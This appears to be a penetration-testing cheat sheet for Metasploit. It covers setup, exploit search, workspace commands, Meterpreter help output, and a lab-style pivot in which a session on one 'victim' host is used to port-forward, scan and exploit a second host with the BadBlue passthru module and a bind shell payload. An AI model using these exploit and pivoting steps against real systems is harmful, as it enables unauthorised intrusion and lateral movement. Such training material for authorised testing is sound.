Launch

sudo systemctl start postgresql
# first launch only
sudo msfdb init
sudo msfdb status
#
msfconsole

Search

msf> search cve:2017 type:exploit platform:windows

Workspace

msf> workspace -h
msf> db_status
msf> workspace -a <new-workspace>
msf> db_import <my-nmap-scan-file.xml>
msf> hosts
msf> services
msf> vulns
msf> creds
msf> db_nmap -Pn -A <IP>

Meterpreter core commands (help output)

background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                       Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
migrate                   Migrate the server to another process
pry                       Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module

Routing / Pivoting

meterpreter> run autoroute -s <ip>
# victim1 10.0.23.180 | victim2 10.0.27.99

meterpreter> run autoroute -s 10.0.23.0/20   # the session on victim1 becomes the route to victim2

msf> use auxiliary/scanner/portscan/tcp   # port scan of victim2 through victim1

meterpreter> portfwd add -l 1234 -p 80 -r 10.0.27.99   # back in the victim1 session, so that nmap can reach port 80

msf> nmap -p1234 localhost -sV -sS   # scans port 80 of victim2 via the local forward

msf> use exploit/windows/http/badblue_passthru
set PAYLOAD windows/meterpreter/bind_tcp
set RHOSTS 10.0.27.99
exploit
# bind shell, because victim2 cannot reach us for a reverse shell

ENUMERATION

Port enumeration (TCP)

msf> use auxiliary/scanner/portscan/tcp